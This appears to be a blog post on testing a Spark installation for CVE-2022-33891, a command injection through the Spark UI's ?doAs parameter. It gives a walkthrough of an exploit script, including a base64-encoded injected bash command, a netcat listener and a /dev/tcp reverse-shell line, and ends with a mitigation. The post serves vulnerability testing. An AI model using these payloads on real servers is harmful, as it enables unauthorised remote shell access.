Skip to main content



CVE-2022-33891 Apache Spark Command Injection Vulnerability

 

Please refer - https://spark.apache.org/security.html


  • The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.
  • If an attacker is sending reverse shell commands using ?doAs. There is also a high chance of granting apache spark server access to the attackers’ machine.
Vulnerability description -

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.


Vulnerable component includes only Spark UI -
  • We tested Spark History Server, which worked fine when tested for vulnerability i.e. no Vulnerability
    • https://<SparkServer>:18081/
  • We tested Spark UI, starting Job using YARN master, which also worked fine for us i.e. no Vulnerability
    • https://<SparkServer>:8090/proxy/application_1684801301953_15767/
    • https://<SparkServer>:4043/
  • We tested Spark UI, starting Job with Local master, and it tested positive for Vulnerability i.e. we were able to do command line injection and execute shell commands on Spark server using remote machine.
    • https://<SparkServer>:4044/


  • Please create clone of above git repository.
  • Install python3 and following required libraries for the script - requests, argparse, colorama

  • Start Spark-Shell with --master local on one your machine in Hadoop Cluster. This will start Spark UI with web URL like -  https://<SparkServer>:4044/
  • Let’s check if this target (https://<SparkServer>:4044/) is vulnerable or not using below mentioned command - 
    • python3 exploit.py -u http://<Spark Server> -p 4044 --check --verbose
                  Note - Above command will append doAs paramter to URL and invoke same -  
      • http://<Spark Server>:4044/?doAs='testing'
      • http://<Spark Server>:4044/?doAs=`echo c2xlZXAgMTA=  | base64 -d | bash`
    • How this script verifies for Vulnerability is by calling above two URL's
      • The first URL invocation tells if URL supports ?doAs request parameter substitution.
      • If ?doAs is not supported then there can not be command line injection. Hence we are safe.
      • Second, it checks to see if we can execute "Sleep 10 " command on remote server. If it does sleep for 10 seconds means remote server is vulnerable else it is not.
  • Above command will tell you if above URL probably vulnerable or not.
  • Let’s use our exploit to get the reverse shell started to execute unix command on server from remote. But, before that start netcat listener to capture traffic for reverse shell using below mentioned command on some remote machine other then Spark Server. 
    • nc -nvlp 9002
  • Let's use  exploit command to start reverse shell.
    • python3 exploit.py -u http://<Spark Server> -p 4044 --revshell -lh <IP_OF_REMOTE_MACHINE_RUNNING_NETCAT> -lp 9002 --verbose
    • Above command Open's a interactive shell on Spark Server redirecting or lisntening to traffic from remote netcat machine. Ex: 
      • sh -i >& /dev/tcp/{IP_OF_REMOTE_MACHINE_RUNNING_NETCAT}/9002 0>&1
  • After this you should see Unix Shell on machine which was running netcat. On this machine you can execute you unix shell commands which will actually execute on remote Spark Server.
    • whoami
    • hostname

To mitigate the issue-
  • Cloudera Suggests to disable following properties (, if enabled)
    • spark.history.ui.acls.enable / spark.acls.enable
                        

Comments

Popular posts

Python [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: Missing Authority Key Identifier

  Error requests.exceptions.SSLError: HTTPSConnectionPool  Max retries exceeded with url:  (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: Missing Authority Key Identifier (_ssl.c:1028)'))). Analysis & Solution Recently, we updated from Python 3.11 to 3.13, which resulted in error above. We did verify AKI = SKI in chain of certificates. Also, imported chain of certificates into certifi. Nothing worked for us. Seemingly, it is a bug with Python 3.13. So, we downgraded to Python 3.12 and it started working. Other problems and solution -  '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1006)'))) solution  pip install pip-system-certs [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: certificate has expired  (_ssl.c:1006) solution  1# openssl s_client -showcerts -connect  signin.aws.amazon.com:443  </dev/...




Spring MongoDB Rest API not returning response in 90 seconds which is leading to client timeout

  We have Spring Boot  Rest API deployed in Kubernetes cluster which integrates with MongoDB to fetch the data.  MongoDB is fed with data by a real time Spark & NiFi job.  Our clients complained that for a request what they send they don't have response within 90 seconds. Consider it like an OMS ( Order ManagEment System).  On further analysis, we found that Spark & NiFi processing is happenning within 10 seconds after consuming response data from Kafka. Thus, initally out thought was that it due to delay from upstream to produce data in to Kafka.  Thankfully, our data had create / request  timestamp, and when response was received, and when response was inserted into MongoDB. Subtracting response insert time from request time seemed to be well within 90 seconds. But, still client did timeout on not seeing a response within 90 seconds. This led to confusion on our side.  But, then we realized it was due to Read Preference . We updated this...




MongoDB Regex Query taking more time in Production but same query perform well in UAT

   We came across a situation where-in, MongoDB Query was taking more time in Production like 10 seconds and 4.2 seconds but same query performed well in UAT taking under 400 ms. The very first thought that was evident to us that it is because of amount of data which differed in UAT and Production. Then we ran following to see the execution plan -   db.collection.aggregate(<queries>).explain() This gave us Winning and Rejected Plans. Under which, we analyzed that although it was using 'IXSCAN.' But, it was incorrect index- as we had one compound index built on time field and other fields, and there was other index just on time field for TTL purposes. Winning plan picked TTL index rather than compound index. Thus, we dropped TTL index and built TTL index on a different time field.  That got our query performance time from 10 seconds to 726 ms. Also, for other query the performance came down from 8 seconds to 4.3 seconds. Then, we ran following -  ...




What is Leadership

 




Spark MongoDB Connector Not leading to correct count or data while reading

  We are using Scala 2.11 , Spark 2.4 and Spark MongoDB Connector 2.4.4 Use Case 1 - We wanted to read a Shareded Mongo Collection and copy its data to another Mongo Collection. We noticed that after Spark Job successful completion. Output MongoDB did not had many records. Use Case 2 -  We read a MongoDB collection and doing count on dataframe lead to different count on each execution. Analysis,  We realized that MongoDB Spark Connector is missing data on bulk read as a dataframe. We tried various partitioner, listed on page -  https://www.mongodb.com/docs/spark-connector/v2.4/configuration/  But, none of them worked for us. Finally, we tried  MongoShardedPartitioner  this lead to constant count on each execution. But, it was greater than the actual count of records on the collection. This seems to be limitation with MongoDB Spark Connector. But,  MongoShardedPartitioner  seemed closest possible solution to this kind of situation. But, it per...